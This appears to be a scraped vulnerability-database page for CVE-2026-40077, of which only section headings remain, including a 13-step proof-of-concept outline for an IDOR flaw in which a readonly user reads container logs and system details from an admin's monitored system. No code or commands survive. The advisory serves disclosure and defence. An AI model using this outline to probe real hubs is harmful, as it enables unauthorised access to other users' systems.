Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40077 (GCVE-0-2026-40077)

FKIE_CVE-2026-40077

GHSA-5F5R-95PG-XRPM

Summary

Affected Component

Vulnerable Code

PoC

Step 1: Start the hub

Step 2: Create User A (admin)

Step 3: Create User B (readonly)

Step 4: Authenticate as User A

Step 5: Get hub public key

Step 6: Create a universal token and start the agent

Step 7: Verify User A sees the system

Step 8: Authenticate as User B (readonly)

Step 9: Control test — standard API blocks User B

Step 10: IDOR — SMART refresh (User B triggers action on User A's system)

Step 11: IDOR — Systemd info (User B reads from User A's system)

Step 12: IDOR — Container logs (User B reads from User A's system)

Step 13: IDOR — Container info (User B reads from User A's system)

Impact

Tags

Sightings

Nomenclature